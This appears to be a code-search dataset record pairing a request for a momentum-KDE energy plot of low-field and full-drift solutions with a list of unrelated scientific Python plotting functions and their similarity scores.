np.arange(1,numpts+1)\n plt.plot(pointindex,mvm)\n\n plt.xlim([0, numpts])\n plt.ylim([-1.5, 1.5])\n plt.ylabel('mvm-XYZPYR')\n\n #Next, plot FD, DVARS and GS on the same plot\n ax2a = fig.add_subplot(gs[2:4])\n ax2b = ax2a.twinx()\n ax2a.plot(pointindex,DVars,color=[0,0,1],alpha=0.5)\n ax2b.plot(pointindex,GS,color=[0,1,0],alpha=0.5)\n ax2a.plot(pointindex,FD*FDmult,color=[1,0,0],alpha=0.5)\n ax2a.hlines(FDthresh*FDmult,pointindex[0],pointindex[-1],'k',alpha=0.5)\n \n plt.xlim([0, numpts])\n ax2a.set_ylim(lylimz)\n ax2a.set_yticks(leftsignallim)\n ax2b.set_ylim(rylimz)\n ax2b.set_yticks(rightsignallim)\n 
ax2a.set_ylabel('R:FD*' + str(FDmult) +' B:DV G:GS')\n\n #next plot gray matter signal\n ax3 = fig.add_subplot(gs[4:8])\n new_GMtcs = QC['GMtcs'][:,:,stage]\n plt.imshow(new_GMtcs,cmap='gray',vmin=-20,vmax=20,aspect='auto') #default: showing 2% signal on mode 1000 norm\n plt.ylabel('GRAY')\n\n #finally, plot WM and CSF ts\n ax4 = fig.add_subplot(gs[8:])\n new_WMCSF = np.vstack((QC['WMtcs'][:,:,stage],QC['CSFtcs'][:,:,stage]))\n plt.imshow(new_WMCSF,cmap='gray',vmin=-20,vmax=20,aspect='auto')\n plt.ylabel('WM CSF')\n plt.xlabel('frames')\n\n return fig", "def plot(self):\n\t\tplot_chain(self.database_path, self.temp_folder)\n\t\tplot_density(self.database_path, self.temp_folder, self.cal_params)", "def plot_dmd(self):\n n_modes = 10\n U = self.uf\n # put the decomposition axis last\n UT = U.transpose(0, 2, 1)\n # create the matrix of snapshots by flattening the non\n # decomp axes so we have a 2d array where we index the\n # decomp axis like snapshots[:,i]\n snapshots = UT.reshape((-1, UT.shape[-1]))\n\n # remove nans\n # TODO: remove nans by interpolation earlier on\n snapshots[np.where(np.isnan(snapshots))] = 0\n\n modes, ritz_values, norms \\\n = mr.compute_DMD_matrices_snaps_method(snapshots, range(n_modes))\n\n # as array, reshape to data dims\n reshaped_modes = modes.A.T.reshape((-1,) + UT.shape[:-1])\n\n fig, ax = plt.subplots(nrows=3)\n c0 = self.mean_velocity_Uf(ax[0])\n\n ax[1].set_title('First mode of DMD')\n ax[1].set_xlabel('time after front passage')\n ax[1].set_ylabel('height')\n c1 = ax[1].contourf(reshaped_modes[0], 100)\n\n ax[2].set_title('Second mode of DMD')\n ax[2].set_xlabel('time after front passage')\n ax[2].set_ylabel('height')\n # TODO: why does reshaped_modes seem to have a list of\n # duplicates?\n # Seems to be complex conjugates - why is this??\n c2 = ax[2].contourf(reshaped_modes[2], 100, levels=c1.levels)\n\n fig.colorbar(c0, ax=ax[0], use_gridspec=True)\n fig.colorbar(c1, ax=ax[1], use_gridspec=True)\n fig.colorbar(c2, ax=ax[2], use_gridspec=True)\n\n fig.tight_layout()\n\n return fig", "def dk_plotting():\n heatmap_mode1_error_x(make_heatmap=False, make_panel=True)\n\n #heatmap_mode1_error_x()\n figure_2_combined_cross_sections()\n\n #heatmap_combined_error_c()\n #heatmap_combined_error_koff()\n #heatmap_kpr_error_c()\n #heatmap_kpr_error_koff()\n\n #heatmap_kpr2_error_c()\n #heatmap_kpr2_error_koff()\n\n ctildePosterior = [truncate(f, 3) for f in list(np.arange(0.0 * KON / KP, 5.0 * KON / KP + 0.005, 0.005))[1:]]\n kofftildePosterior = [truncate(f, 2) for f in list(np.arange(0.0 / KP, 50.0 / KP + 0.05, 0.05))[1:]]\n\n #heatmap_figure_4()\n\n return 0", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n 
ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def _plot(self, rewards, losses, epsilons):\n plt.figure(figsize=(20,5))\n plt.subplot(131)\n plt.title('Episodic Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('TD Loss')\n plt.plot(losses)\n plt.subplot(133)\n plt.title('Epsilon')\n plt.plot(epsilons)\n plt.tight_layout()\n plt.show()", "def plot_pade_figure(self):\n data_analysis = DatabaseData(dataframe=self.plot_data)\n print (data_analysis.dataframe.columns)\n data_analysis.run_pade_through_R(rscript='birch',get_inits_ev=True)\n data_analysis.create_precisions()\n data_analysis.extract_pade_curve()\n x_eos_kpts, y_eos, xs_err, ys_err, x_pade_kpts, y_pade = \\\n data_analysis.create_pade_bokeh_compat(properties=self.properties)\n print (type(self.properties), self.properties)\n if self.properties == 'B':\n ext = data_analysis.Bp\n print ('HERE AT PROPERTIES', ext, type(ext))\n elif self.properties == 'BP':\n ext = data_analysis.BPp\n elif self.properties == 'E0':\n ext = data_analysis.E0p\n elif self.properties == 'V0':\n ext = data_analysis.V0p\n p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n x_axis_type=\"log\", x_axis_label='K-points per atom', title='Pade Extrapolate of {0} is {1}'.format(self.properties, str(ext)) )\n p.xaxis.axis_label = 'K-points per atom'\n p.line(x_pade_kpts, y_pade, color='red')\n p.circle(x_eos_kpts, y_eos,color='blue',size=5, line_alpha=0)\n p.multi_line(xs_err, ys_err, color='black')\n if self.properties == 'B':\n p.yaxis.axis_label = 'Bulk Modulus B (GPa)'\n elif self.properties == 'dB':\n p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative'\n elif self.properties == 'E0':\n p.yaxis.axis_label = 'DFT Energy (eV/atom)'\n elif self.properties == 'V0':\n p.yaxis.axis_label = 'Volume (A^3/atom)'\n\n return p", "def plot_ps(self, show=False, density=True, pcolor=\"r\", mcolor=\"b\", lw=0.6):\n\n if (density):\n \"\"\" also read the local overdeOptimization of spectroscopic surveys for testing non-Gaussianity\nnsity value and plot line colors according to\n the density value, + = red, - = blue; adjust alpha accordingly\n \"\"\"\n if len(self.ds)<self.Nsubs:\n print (\"no density data\")\n return 0\n ads=np.abs(self.ds)\n meands=np.mean(self.ds)\n mads=np.max(ads)\n normds=np.array([ads[i]/mads/1.5 for i in range(len(ads))])\n self.normds=normds\n\n for sub in range(self.Nsubs):\n #print sub\n if not(density):\n self.plt.plot(self.klist, self.pfactor*self.powerspectra[sub])\n else:\n if self.ds[sub]>meands:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=pcolor, alpha=normds[sub], linewidth=lw)\n else:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=mcolor, alpha=normds[sub], linewidth=lw)\n #self.plt.xlim(self.klist[1], 0.1)\n #if (self.normalized):\n # self.plt.ylim(0.0,2)\n #else:\n # self.plt.ylim(500, 50000)\n # self.plt.yscale('log')\n\n self.plt.xlabel(r\"$k {\\rm (h/Mpc)}$\")\n if (self.normalized):\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)/ P_{\\rm avg}(k)$\")\n self.plt.yscale('linear')\n else:\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)\\; {\\rm (Mpc/h)}^3$\")\n self.plt.yscale('log')\n\n if (show):\n self.plt.show()", "def plot_decompose(self):\n try:\n assert self._arr_seasonal is not None\n 
except AssertionError:\n self.ts_decompose()\n\n fig, axes = plt.subplots(5, 1, figsize=(20, 9), sharex=True)\n axes[0].plot(self._res_decomp.observed)\n axes[0].set_ylabel(\"Original\")\n #\n axes[1].plot(self._arr_trend)\n axes[1].set_ylabel(\"Trend\")\n #\n axes[2].plot(self._arr_seasonal)\n axes[2].set_ylabel(\"Seasonal\")\n #\n axes[3].plot(self._arr_baseline)\n axes[3].set_ylabel(\"Baseline\")\n #\n axes[4].plot(self.residuals)\n axes[4].set_ylabel(\"Residuals\")\n #\n if self.upper_whisker_res is not None:\n axes[4].axhline(y=self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n axes[4].axhline(y=-self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n\n plt.gcf().autofmt_xdate()\n plt.grid(True)\n plt.show()", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n 
ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def compare_averages_shell_pspec_dft():\n\n select_radius = 5. #degrees\n\n Nside=256\n Npix = 12 * Nside**2\n Omega = 4*np.pi/float(Npix)\n\n Nfreq = 100\n freqs = np.linspace(167.0, 177.0, Nfreq)\n dnu = np.diff(freqs)[0]\n Z = 1420/freqs - 1.\n\n sig = 2.0\n mu = 0.0\n shell = np.random.normal(mu, sig, (Npix, Nfreq))\n\n dV = comoving_voxel_volume(Z[Nfreq/2], dnu, Omega)\n variances = []\n means = []\n pks = []\n\n gs = gridspec.GridSpec(2, 3)\n fig = pl.figure()\n\n ax0 = pl.subplot(gs[0, 0:2])\n ax1 = pl.subplot(gs[1, 0])\n ax3 = pl.subplot(gs[1, 1])\n ax2 = pl.subplot(gs[:, 2])\n\n steps = range(10,110,10)\n vmin,vmax = min(steps),max(steps)\n normalize = mcolors.Normalize(vmin=vmin, vmax=vmax)\n colormap = cm.viridis\n\n for n in steps:\n Nkbins = 100\n kbins, pk = pspec_funcs.shell_project_pspec(shell, Nside, select_radius, freqs=freqs, Nkbins=Nkbins, N_sections=n, cosmo=True, method='dft', error=False)\n variances.append(np.var(pk[0:Nkbins-5]))\n means.append(np.mean(pk[0:Nkbins-5]))\n pks.append(pk)\n ax0.plot(kbins, pk, label=str(n), color=colormap(normalize(n)))\n\n ax0.axhline(y=dV*sig**2, color='k', lw=2.0)\n# ax0.legend()\n scalarmappable = cm.ScalarMappable(norm=normalize, cmap=colormap)\n scalarmappable.set_array(steps)\n fig.colorbar(scalarmappable,label=r'Number of snapshots', ax=ax0)\n ax0.set_ylabel(r\"P(k) [mK$^2$ Mpc$^{3}]$\")\n ax0.set_xlabel(r\"k [Mpc$^{-1}]$\")\n ax1.plot(steps, np.array(variances), label=\"Variance\")\n ax1.set_ylabel(r\"Variance(P(k)) [mK$^4$ Mpc$^{6}]$\")\n ax1.set_xlabel(u\"Number of 5° snapshots\")\n ax3.plot(steps, means, label=\"Mean\")\n ax3.set_ylabel(r\"Mean(P(k)) [mK$^2$ Mpc$^{3}]$\")\n ax3.set_xlabel(u\"Number of 5° snapshots\")\n ax1.legend()\n ax3.legend()\n im = ax2.imshow(np.array(pks)[:,0:Nkbins-5], aspect='auto')#, norm=mcolors.LogNorm())\n fig.colorbar(im, ax=ax2)\n print('Fractional deviation: ', np.mean(np.abs(pk - dV*sig**2)))\n pl.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, 
tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def _kde_example(data):\n # Plot the data\n ch = chartify.Chart(blank_labels=True, y_axis_type=\"density\")\n ch.set_title(\"KDE plot\")\n ch.plot.kde(data_frame=data, values_column=\"unit_price\", color_column=\"fruit\")\n ch.show(_OUTPUT_FORMAT)", "def test_lightcurve_seismology_plot():\n KeplerLightCurveFile(TABBY_Q8).PDCSAP_FLUX.periodogram().plot()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", delimiter=\" \", header=None) # Load the XPP simulation\n\n plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly 
calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: 
plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n print(f'Saved plot to: plots/thm2_D.pdf')" ]
[ "0.73927927", "0.7082678", "0.64685386", "0.6194481", "0.60984546", "0.6091529", "0.5944429", "0.5879228", "0.58678186", "0.5845622", "0.5829439", "0.5824676", "0.58108956", "0.5784534", "0.57618827", "0.57524467", "0.57417613", "0.57405406", "0.57309103", "0.57143843", "0.5704922", "0.56943214", "0.5686127", "0.56705725", "0.56550974", "0.5647726", "0.5636573", "0.5631705", "0.5630242", "0.56177676" ]
0.7817756
0
Make an energy plot for the momentum KDE of the low-field and full-drift solutions.
def energy_kde_paperplot(fields,df):\n plt.figure()\n i = 0\n colorList = ['dodgerblue','tomato']\n lw = 2\n meanE_2 = []\n meanE_3 = []\n mup = np.min(df['energy [eV]']) - pp.mu\n chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(fields[0]))\n g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \\\n occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', linewidth=lw,label='Equilibrium')\n for ee in fields:\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee))\n # meanE_2 = utilities.mean_energy(chi_2_i,df)\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],linewidth=lw,label=r'Low Field {:.0f} '.format(ee/100)+r'$V \, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.')\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee))\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],linewidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n i = i + 1\n # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', color='black', linewidth=lw,label=r'$f_0$')\n plt.legend()\n # plt.ylim([-0.02, 0.015])\n plt.xlabel(r'Energy above CBM ($eV$)')\n plt.ylabel(r'Deviational occupation $\delta f_{\mathbf{k}}$ (norm.)')\n # plt.ylabel(r'$\delta f_{\mathbf{k}}/f_{\mathbf{k}}^0$')\n plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600)\n\n plt.figure()\n plt.plot(g_en_axis,g_chiax)\n\n plt.figure()\n Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i)\n plt.pcolormesh(xedges, yedges, Z.T)\n\n from scipy.stats.kde import gaussian_kde\n g_inds,_,_ = utilities.gaas_split_valleys(df,False)\n g_df = df.loc[g_inds]\n x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD'])\n k = gaussian_kde(np.vstack([x, y]))\n xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j]\n zi = k(np.vstack([xi.flatten(), yi.flatten()]))\n\n fig = plt.figure(figsize=(7, 8))\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n\n # alpha=0.5 will make the plots semitransparent\n ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n\n ax1.set_xlim(x.min(), x.max())\n ax1.set_ylim(y.min(), y.max())\n ax2.set_xlim(x.min(), x.max())\n 